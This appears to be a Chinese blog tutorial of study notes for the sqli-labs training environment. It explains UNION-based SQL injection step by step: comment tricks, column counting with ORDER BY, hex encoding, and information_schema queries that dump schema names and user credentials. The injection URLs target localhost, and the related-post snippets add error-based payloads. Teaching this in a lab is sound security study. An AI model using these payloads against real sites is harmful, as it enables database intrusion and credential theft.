sqli labs master 闖關前知識點學習

2021-10-25 07:14:22 字數 2557 閱讀 8655

1)、前期準備、知識點

開始之前,為了方便檢視sql注入語句,我在sqli-labs-master網頁原始碼php部分加了兩行**,第一行意思是輸出資料庫語句,第二行是換行符

一、mysql 登入

1、明文密碼 在bin目錄下 輸入:mysql -u 賬戶 -p 密碼

2、**密碼 在bin目錄下 輸入:mysql -u 賬戶 -p 後回車再輸入密碼

二、注釋符

–+ – # 都是sql語句的注釋符 ,sql語句執行到此結束。

三、and or

a and b a,b都ture 結果才為ture

a or b a,b 有乙個ture 結果就為ture

四、limit

limit m,n :顯示從m列開始 顯示n行

五、 ?id=1 後加 』

可以判斷存在sql漏洞,

例如:http://localhost/sqli-labs-master/less-1/?id= 1』or 1=1 --+

sql語句:select * from users where id=』 1』or 1=1 – 』 limit 0,1

六、order by

order by + n : 查詢結果根據第n列排序

order by 可判斷資料表 列數

在嘗試是n值折半測試

例:http://localhost/sqli-labs-master/less-1/?id=1』order by 3 --+

七、union 聯合查詢

在使用 order by 測試出列數後,使用 union + 數字 檢視回顯資訊,測試回顯的哪幾列,

錯誤示例:http://localhost/sqli-labs-master/less-1/?id=1』union select 1,2,3–+

如圖,在id值正確時 由於limit 0,1只能顯示一行,回顯結果無法做出正確判斷

正確示例:http://localhost/sqli-labs-master/less-1/?id=-1』union select 1,2,3–+

如圖,將id值設定為-1(即不存在值),結果回顯為第2、3列

九、』 部分 特殊字元部分轉化為十六進製制

注:在sql注入時 如需 』 』 單引號括住內容 盡量轉化為16進製制(0x+內容的十六進製制)

方式如下:

十、暴庫sql語句

查庫:select schema_name from information_schema.schemata

查表:select table_name from information_schema.tables where table_schema=『庫名』

查列:select column_name from information_schema.columns where table_name=『表名』

查字段:select 列1,列2,列3 from 庫名.表名

注:引號包裹部分 整體使用十六進製制代替 如 table_schema=『security』 -> table_schema=0x7365637572697479

十一、sql常用函式

查詢函式

1.version() --mysql版本

2.user() --資料庫使用者名稱

3.database() --資料庫名

4.@@datadir --資料庫安裝路徑

5.@@version_compile_os --作業系統的版本

字串連線函式:

1.concat(字串1,字串2) --沒有分隔符的連線字串

2.concat_ws(-/~,字串1,字串2) --含有分隔符的連線字串

3.group_concat(字串1,字串2) --連線乙個組的所有字串,並用,分隔每乙個字元。

例:select 1,2,group_concat(concat_ws(0x2d2d,id,username,password)) from security.users

使用及區別詳情見:

本文參考於:

Sqli labs master 5 6闖關遊戲

less 5 通過盲注 and 1 1 and 1 2 來構造sql語句,最終發現構造語句如下 這裡我們發現並沒有返回值,通過構造sql語句爆庫也沒有任何返回值 所以我們猜測這裡可能用報錯注入 在進行爆庫之前我們要先了解報錯注入要用到的函式 updatexml xml document,xpath ...

sqli labs master 第十一關

本關為post請求 輸入 admin 密碼 隨意 爆出當前資料庫 使用者名稱 payload1 admin and extractvalue 1,concat 0x7e,database 0x7e payload2 admin and extractvalue 1,concat 0x7e,selec...

電子老鼠闖迷宮

有乙隻電子老鼠被困在如下圖所示的迷宮中。這是乙個12 12單元的正方形迷宮,黑色部分表示建築物,白色部分是路。電子老鼠可以在路上向上 下 左 右行走,每一步走乙個格仔。現給定乙個起點s和乙個終點t,求出電子老鼠最少要幾步從起點走到終點。輸入 本題包含乙個測例。在測例的第一行有四個由空格分隔的整數,分...